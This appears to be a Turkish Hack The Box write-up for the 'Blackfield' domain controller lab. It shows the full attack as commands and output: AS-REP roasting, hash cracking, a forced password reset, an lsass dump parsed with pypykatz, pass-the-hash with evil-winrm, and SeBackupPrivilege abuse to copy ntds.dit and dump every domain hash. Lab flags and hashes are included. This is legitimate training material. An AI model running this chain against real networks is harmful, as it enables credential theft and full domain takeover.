| Makine Adı | Seviye | OS | Logo |
|---|---|---|---|
| Blackfield - HTB | Zor | Windows |
Walkthrough
nmap taraması:
┌──(root💀kali)-[~]
└─# nmap 10.10.10.192 -p- -A -T4
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-26 17:24 EDT
Nmap scan report for 10.10.10.192
Host is up (0.074s latency).
Not shown: 65526 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-09-27 05:29:12Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
49676/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h01m54s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-09-27T05:30:08
|_ start_date: N/A
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 74.20 ms 10.10.14.1
2 74.18 ms 10.10.10.192
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 240.87 seconds
Bir dc olduğu belli. Protokollere göre incelemeye başladım ilk olrak smb ile başladım.
┌──(root💀kali)-[~]
└─# smbmap -H "10.10.10.192" -u 'a' 130 ⨯
[+] Guest session IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
Daha iyi bir inceleme için mount etmeye karar verdim.
┌──(root💀kali)-[~]
└─# mount -t cifs //10.10.10.192/profiles$ /mnt/10.10.10.192/profiles 130 ⨯
Password for root@//10.10.10.192/profiles$:
/mnt/10.10.10.192/profiles klasörünün altına gittiğimde bir sürü isim bulunmaktaydı bende bunları AD kullancısı olabilir diye düşünüp bir wordlist' aktardım.
┌──(root💀kali)-[/mnt/10.10.10.192/profiles]
└─# ls
AAlleni BSamkoses ETurgano KAmavisca MHoerauf RNemnich TKauten
ABarteski BZandonella EWojtila KAtolikian MKermarrec RPoretsky TKnupke
ABekesz CAcherman FAlirezai KBrokinn MKillberg RStuehringer TLintlop
ABenzies CAkbari FBaldwind KCockeril MLapesh RSzewczuga TMusselli
ABiemiller CAldhowaihi FBroj KColtart MMakhsous RVallandas TOust
AChampken CArgyropolous FDeblaquire KCyster MMerezio RWeatherl TSlupka
ACheretei CDufrasne FDegeorgio KDorney MNaciri RWissor TStausland
ACsonaki CGronk FianLaginja KKoesno MShanmugarajah SAbdulagatov TZumpella
AHigchens Chiucarello FLasokowski KLangfur MSichkar SAjowi UCrofskey
AJaquemai Chiuccariello FPflum KMahalik MTemko SAlguwaihes UMarylebone
AKlado CHoytal FReffey KMasloch MTipirneni SBonaparte UPyrke
AKoffenburger CKijauskas GaBelithe KMibach MTonuri SBouzane VBublavy
AKollolli CKolbo Gareld KParvankova MVanarsdel SChatin VButziger
AKruppe CMakutenas GBatowski KPregnolato NBellibas SDellabitta VFuscca
AKubale CMorcillo GForshalger KRasmor NDikoka SDhodapkar VLitschauer
ALamerz CSchandall GGomane KShievitz NGenevro SEulert VMamchuk
AMaceldon CSelters GHisek KSojdelius NGoddanti SFadrigalan VMarija
AMasalunga CTolmie GMaroufkhani KTambourgi NMrdirk SGolds VOlaosun
ANavay DCecere GMerewether KVlahopoulos NPulido SGrifasi VPapalouca
ANesterova DChintalapalli GQuinniey KZyballa NRonges SGtlinas WSaldat
ANeusse DCwilich GRoswurm LBajewsky NSchepkie SHauht WVerzhbytska
AOkleshen DGarbatiuc GWiegard LBaligand NVanpraet SHederian WZelazny
APustulka DKemesies HBlaziewske LBarhamand OBelghazi SHelregel XBemelen
ARotella DMatuka HColantino LBirer OBushey SKrulig XDadant
ASanwardeker DMedeme HConforto LBobelis OHardybala SLewrie XDebes
AShadaia DMeherek HCunnally LChippel OLunas SMaskil XKonegni
ASischo DMetych HGougen LChoffin ORbabka Smocker XRykiel
ASpruce DPaskalev HKostova LCominelli PBourrat SMoyta YBleasdale
ATakach DPriporov IChristijr LDruge PBozzelle SRaustiala YHuftalin
ATaueg DRusanovskaya IKoledo LEzepek PBranti SReppond YKivlen
ATwardowski DVellela IKotecky LHyungkim PCapperella SSicliano YKozlicki
audit2020 DVogleson ISantosi LKarabag PCurtz SSilex YNyirenda
AWangenheim DZwinak JAngvall LKirousis PDoreste SSolsbak YPredestin
AWorsey EBoley JBehmoiras LKnade PGegnas STousignaut YSeturino
AZigmunt EEulau JDanten LKrioua PMasulla support YSkoropada
BBakajza EFeatherling JDjouka LLefebvre PMendlinger svc_backup YVonebers
BBeloucif EFrixione JKondziola LLoeradeavilez PParakat SWhyte YZarpentine
BCarmitcheal EJenorik JLeytushsenior LMichoud PProvencer SWynigear ZAlatti
BConsultant EKmilanovic JLuthner LTindall PTesik TAwaysheh ZKrenselewski
BErdossy ElKatkowsky JMoorehendrickson LYturbe PVinkovich TBadenbach ZMalaab
BGeminski EmaCaratenuto JPistachio MArcynski PVirding TCaffo ZMiick
BLostal EPalislamovic JScima MAthilakshmi PWeinkaus TCassalom ZScozzari
BMannise EPryar JSebaali MAttravanam RBaliukonis TEiselt ZTimofeeff
BNovrotsky ESachhitello JShoenherr MBrambini RBochare TFerencdo ZWausik
BRigiero ESariotti JShuselvt MHatziantoniou RKrnjaic TGaleazza
┌──(root💀kali)-[/mnt/10.10.10.192/profiles]
└─# ls > /home/kali/Desktop/HTB/Windows/10.10.10.192/users
Daha sonrasında akıma as-reproast saldırısı geldi ve denedim.
┌──(root💀kali)-[/home/…/HTB/Windows/10.10.10.192/test]
└─# crackmapexec ldap 10.10.10.192 -u ../users -p '' --asreproast result --kdcHost 10.10.10.192 1 ⨯
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [email protected]:baddce346affba1e06d1527007250944$38fdb239c4eeca072445d1d99b9992de43bc0cca30e5c235742537bc6b49b9295cafbf5c095cb77692aa6fb14ac895d38ef154b11615252d38
cfafb35764215b9d8bdc0119160e653cfdc1a4afb6938eb96fa3643cef14d968838de93c17839bc3b2713f7cda9f26cfb62df588786972bf08327f5ae497bc80b6621b0ad0fa0ad9d5c6a6cc1c323f6402834f087fef27bcf6b491cc11255ffe1f53b7d2f3467a26f9ac2cc654deba2500d2fc0f690091
856ed4758ea4e3a2ed0b3ceb2f1abdb1b3ba12a753d6a0bcd11d74ee7ee3a7dc3163c7b62fc0db8361f565566368e6ba1d8b638eba65bd8d546d3d88d93ffd0749a9ab1e
Harika! Daha sonra bu hashi kırdım.
┌──(root💀kali)-[/home/…/HTB/Windows/10.10.10.192/hash]
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
#00^BlackKnight ([email protected])
1g 0:00:00:12 DONE (2021-09-26 18:31) 0.07710g/s 1105Kp/s 1105Kc/s 1105KC/s #1ByNature..#*burberry#*1990
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Artık bir credentiala sahibim ve bununla birlikte ldap aracılığıyla bloodhound çalıştırabilirim.
┌──(root💀kali)-[/home/…/HTB/Windows/10.10.10.192/blood]
└─# bloodhound-python -u support -p '#00^BlackKnight' -ns 10.10.10.192 -d blackfield.local -c all 130 ⨯
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 14S
Sonuçlara bakarken aşağıdaki sonucu buldum. audit2020 kullanıcısının paroalsını direkt olarak değiştirebiliyorum. Harika! Bunun için rpc'yi kullandım. Daha ayrntılı bilgi için buradaki kopya kağıdı incelenebilir.
(https://www.willhackforsushi.com/sec504/SMB-Access-from-Linux.pdf)

Kullanıcının paroalsını değiştirdim.
│
┌──(root💀kali)-[~] │
└─# rpcclient 10.10.10.192 -U support │
1 ⨯ │
Enter WORKGROUP\support's password: │
rpcclient $> chgpasswd3 audit2020 │
Usage: chgpasswd3 username oldpass newpass │
result was NT_STATUS_INVALID_PARAMETER │
rpcclient $> setuserinfo2 audit2020 24 'Password1' │
rpcclient $>
┌──(root💀kali)-[/home/…/Windows/10.10.10.192/blood/adit]
└─# crackmapexec ldap 10.10.10.192 -u audit2020 -p 'Password1' --kdcHost 10.10.10.192
LDAP 10.10.10.192 389 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
LDAP 10.10.10.192 389 DC01 [+] BLACKFIELD.local\audit2020:Password1
┌──(root💀kali)-[/home/…/Windows/10.10.10.192/blood/adit]
└─# bloodhound-python -u audit2020 -p 'Password1' -ns 10.10.10.192 -d blackfield.local -c all
INFO: Found AD domain: blackfield.local
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 315 users
INFO: Connecting to GC LDAP server: dc01.blackfield.local
INFO: Found 51 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.BLACKFIELD.local
INFO: Done in 00M 14S
Onunlada bloodhound attım ancak pek işe yarar sonuç gelmedi. winrm ile bağlantıda kuramıyordum. Bunun üzerine tekrara smb'ye baktım.
┌──(root💀kali)-[~]
└─# crackmapexec smb 10.10.10.192 -u audit2020 -p Password1 --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:Password1
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
lsass process'inin dump'ını aldım.
┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]
└─# smbclient -U audit2020 \\\\10.10.10.192\\forensic
Enter WORKGROUP\audit2020's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
7846143 blocks of size 4096. 4107878 blocks available
smb: \> cd memory_analysis
smb: \memory_analysis\> ls
. D 0 Thu May 28 16:28:33 2020
.. D 0 Thu May 28 16:28:33 2020
conhost.zip A 37876530 Thu May 28 16:25:36 2020
ctfmon.zip A 24962333 Thu May 28 16:25:45 2020
dfsrs.zip A 23993305 Thu May 28 16:25:54 2020
dllhost.zip A 18366396 Thu May 28 16:26:04 2020
ismserv.zip A 8810157 Thu May 28 16:26:13 2020
lsass.zip A 41936098 Thu May 28 16:25:08 2020
mmc.zip A 64288607 Thu May 28 16:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020
ServerManager.zip A 131983313 Thu May 28 16:26:49 2020
sihost.zip A 33141744 Thu May 28 16:27:00 2020
smartscreen.zip A 33756344 Thu May 28 16:27:11 2020
svchost.zip A 14408833 Thu May 28 16:27:19 2020
taskhostw.zip A 34631412 Thu May 28 16:27:30 2020
winlogon.zip A 14255089 Thu May 28 16:27:38 2020
wlms.zip A 4067425 Thu May 28 16:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020
7846143 blocks of size 4096. 4107878 blocks available
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (2605.7 KiloBytes/sec) (average 2605.7 KiloBytes/sec)
smb: \memory_analysis\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now
┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192] └─# pypykatz lsa minidump lsass.DMP
INFO:root:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
== SSP [633ba]==
username
domainname
password None
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
Password: None
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
...
...
Daha sonrasında oradan svc_backup kullanıcısının ntlm hash'ini aldım. Artık makineye bağlantı kurabiliyorum.
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.10.192 -u svc_backup -H '9658d1d1dcd9250115e2205d9f48400d'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cat ../Desktop/user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeBackupPrivilege grubuna üyeysek makine içerisindeki bütün dosyaları yedekleyebiliriz anlamına geliyor eğer bu makine bir DC ise ntds, eğer bir client windows 10'sa sam dosyası gibi dosyalarda dahil olmak üzere. https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960 adresinde aslında nasıl exploit edileceği anlatılmış. Bizde aynı yönergeleri izleyeceğiz.
1 ⨯
┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]
└─# cat back_script.txt 130 ⨯
set verbose onX
set metadata C:\Windows\Temp\meta.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
┌──(root💀kali)-[/home/…/Desktop/HTB/Windows/10.10.10.192]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.192 - - [27/Sep/2021 11:27:49] "GET /back_script.txt HTTP/1.1" 200 -
E diskini oluşturduk ve işlemlerimize artık oradan devam edeceğiz. Bu dosyayı windows'a kopyalamalıyız. Bunun için ben bir http sunucusu oluşturdum.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> Invoke-WebRequest -Uri http://10.10.14.20/back_script.txt -OutFile C:\Us
ers\svc_backup\Documents\back_script.txt
*Evil-WinRM* PS C:\Users\svc_backup\Documents> diskshadow /s back_script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: DC01, 9/27/2021 4:30:13 PM
-> set verbose on
-> set metadata C:\Windows\Temp\meta.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Excluding writer "Shadow Copy Optimization Writer", because all of its components have been excluded.
Component "\BCD\BCD" from writer "ASR Writer" is excluded from backup,
because it requires volume which is not in the shadow copy set.
The writer "ASR Writer" is now entirely excluded from the backup because the top-level
non selectable component "\BCD\BCD" is excluded.
* Including writer "Task Scheduler Writer":
+ Adding component: \TasksStore
* Including writer "VSS Metadata Store Writer":
+ Adding component: \WriterMetadataStore
* Including writer "Performance Counters Writer":
+ Adding component: \PerformanceCounters
...
...
*Evil-WinRM* PS C:\Users\svc_backup\Documents> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, September 27, 2021 4:32:15 PM
Source : E:\Windows\ntds\
Dest : C:\Users\svc_backup\Documents\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 18.0 m ntds.dit
0.0%
0.3%
...
...
100%
```
```sh
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system C:\Users\svc_backup\Documents\system.bak
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download ntds.dit
Info: Downloading ntds.dit to ./ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system.bak
Info: Downloading system.bak to ./system.bak
Info: Download successful!
Dosyaları elde ettiten sonra credentialları okudum.
┌──(root💀kali)-[/usr/share/doc/python3-impacket/examples]
└─# python3 secretsdump.py -ntds /root/ntds.dit -system /root/system.bak local
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from /root/ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:5d27ca03d3f067ec45c2d2800a12b409:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:600a406c2c1f2062eb9bb227bad654aa:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
...
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.10.10.192 -u Administrator -H '184fb5e5178480be64824d4cd53b99ee'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 11/5/2020 8:38 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
4375a629c7c67c8e29db269060c955cb
İlk Yorumu Siz Yapın